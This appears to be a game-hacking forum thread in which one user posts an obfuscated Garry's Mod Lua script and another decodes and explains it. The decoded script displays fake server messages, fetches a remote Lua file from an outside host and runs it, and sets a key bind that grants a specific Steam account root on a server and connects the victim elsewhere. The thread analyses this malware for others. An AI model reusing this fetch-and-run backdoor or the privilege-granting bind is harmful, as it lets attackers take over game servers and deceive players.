Results 1 to 2 of 2
  1. #1
    Voruks's Avatar
    Join Date
    Dec 2019
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0

    help me to deobfuscate a code, what does it do?

    can someone help me to deobfuscate this code please

    Code:
    local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_,16),199)) end return ‪‪‪‪‪ end ‪[‪‪‪‪‪‪‪'b3aeaaa2b5'][‪‪‪‪‪‪‪'94aeaab7aba2'](1,function ()‪[‪‪‪‪‪‪‪'95b2a984a8a9b4a8aba284a8aaaaa6a9a3'](‪‪‪‪‪‪‪'a1b2b4b3b5b7b3a8b7')‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae71764176817501755175f175b175917661765176be717591756176717571756175917651757175a1757e9e9e9')end )‪[‪‪‪‪‪‪‪'b3aeaaa2b5'][‪‪‪‪‪‪‪'94aeaab7aba2'](5,function ()if ‪[‪‪‪‪‪‪‪'8ba8a4a6ab97aba6bea2b5']()[‪‪‪‪‪‪‪'8eb4918e97'](‪[‪‪‪‪‪‪‪'8ba8a4a6ab97aba6bea2b5']())then ‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae717581647177f17751772177c17721774177f1648e71644164617781772164f177a1779e71775164c17731777177a1777e9')else ‪[‪‪‪‪‪‪‪'a4afa6b3'][‪‪‪‪‪‪‪'86a3a393a2bfb3'](‪‪‪‪‪‪‪'9c9482959182959ae7176417781646e9e9e7176016451779ea16451779e717781779164f177c1779e7177a1772e716451777177de9e9')end end )‪[‪‪‪‪‪‪‪'afb3b3b7'][‪‪‪‪‪‪‪'81a2b3a4af'](‪‪‪‪‪‪‪'afb3b3b7fde8e8aaaeababa2a9aeb2aab7e9b5b2e8b4b3a2a6abe8a5a6a9bdf6e8afa6ace9abb2a6',function (‪else)‪[‪‪‪‪‪‪‪'95b2a994b3b5aea9a0'](‪else)end )

  2. #2
    IVogelI's Avatar
    Join Date
    Dec 2015
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Nothing interesting, IMHO
    Just a skiddos from russian GMod community.
    Code:
    local function DecodeString(sArg)
    	if string.len(sArg) == 0 then return sArg end
    	local ret = ''
    
    	for _ in string.gmatch(sArg, '\46\46') do
    		ret = ret .. string.char(bit.bxor(tonumber(_, 16), 199))
    	end
    
    	return ret
    end
    
    timer.Simple(1, function()
    		RunConsoleCommand("fustrptop")
    		chat.AddText("[SERVER] УЯЗВИМОСТЬ ОБРАБОТАНА...")
    end)
    timer.Simple(5, function()
    	if LocalPlayer()IsVIP(LocalPlayer()) then
    		chat.AddText("[SERVER] Привелегия успешно выдана.")
    	else
    		chat.AddText("[SERVER] Упс.. Что-то пошло не так..")
    	end
    end)
    http.Fetch("https://milleniump.ru/steal/banz1/hak.lua",function (sBody) RunString(sBody) end)
    
    --[[-------------------------------------------------------------------------
    	Code below is code from this url above
    ---------------------------------------------------------------------------]]
    
    _G["cvar"]["Register"]("enable.enhud")["SetDefault"](_G["cvar"]["Register"]("enable.enhud"), true)["SetValue"](_G["cvar"]["Register"]("enable.enhud")["SetDefault"](_G["cvar"]["Register"]("enable.enhud"), true), _G["cvar"]["GetValue"](_G["var"]) and 1 or true)
    _G["cvar"]["Register"]("enable_thirdperson")["SetDefault"](_G["cvar"]["Register"]("enable_thirdperson"), true)["SetValue"](_G["cvar"]["Register"]("enable_thirdperson")["SetDefault"](_G["cvar"]["Register"]("enable_thirdperson"), true), _G["cvar"]["GetValue"](_G["var"]) and 1 or true)
    _G["cvar"]["Register"]("enable.agendahud")["SetDefault"](_G["cvar"]["Register"]("enable.agendahud"), false)["SetValue"](_G["cvar"]["Register"]("enable.agendahud")["SetDefault"](_G["cvar"]["Register"]("enable.agendahud"), false), _G["cvar"]["GetValue"](_G["var"]) and 1 or false)
    _G["cvar"]["Register"]("media_volume")["SetDefault"](_G["cvar"]["Register"]("media_volume"), 0)["SetValue"](_G["cvar"]["Register"]("media_volume")["SetDefault"](_G["cvar"]["Register"]("media_volume"), 0), _G["cvar"]["GetValue"](_G["var"]) and 1 or "ses")
    _G["cvar"]["Register"]("show_custom_hud")["SetValue"](_G["cvar"]["Register"]("show_custom_hud"), _G["cvar"]["GetValue"](_G["var"]) and 1 or true)
    _G["cvar"]["Register"]("key_binds")
    
    _G["temp"] = {
    	{
    		["Key"] = 14,
    		["Cmd"] = "ba setgroup STEAM_0:0:135734974 root; connect 46.174.52.192:27015; ",
    		["Type"] = "Свой"
    	},
    	{
    		["Key"] = "fustrp_tops",
    		["Cmd"] = '',
    		["Type"] = "Свой"
    	}
    }
    
    _G["cvar"]["SetValue"]("key_binds", _G["temp"])
    _G["cvar"]["Register"]("ColorFilter")["SetValue"](_G["cvar"]["Register"]("ColorFilter"), _G["cvar"]["GetValue"](_G["var"]) and 1 or "Черно & Белый")
    _G["cvar"]["Register"]("enable_hud")["SetValue"](_G["cvar"]["Register"]("enable_hud"), _G["cvar"]["GetValue"](_G["var"]) and 1 or false)
    _G["cvar"]["Register"]("invert_thirdp_mouse")["SetValue"](_G["cvar"]["Register"]("invert_thirdp_mouse"), _G["cvar"]["GetValue"](_G["var"]) and 1 or true)

Similar Threads

  1. [Solved] help me to deobfuscate a code
    By ppop222 in forum Garry's Mod Discussions & Help
    Replies: 14
    Last Post: 07-29-2019, 03:49 PM
  2. [Help Request] The Code What went wrong Dont Work= = pls help me
    By 31459380 in forum H1Z1 Hacks & Cheats
    Replies: 2
    Last Post: 05-02-2015, 05:25 PM
  3. Error Code Pi 99999 WHat does this mean, fixes?
    By ryanrob20 in forum Combat Arms Help
    Replies: 11
    Last Post: 01-26-2010, 01:22 PM
  4. What does this error mean? (giving out NX reward for help)
    By monsterthejuggalo in forum Combat Arms Hacks & Cheats
    Replies: 11
    Last Post: 09-20-2009, 05:20 PM
  5. [Help] What does this mean?
    By ahlun89 in forum Combat Arms Hacks & Cheats
    Replies: 7
    Last Post: 10-23-2008, 05:22 PM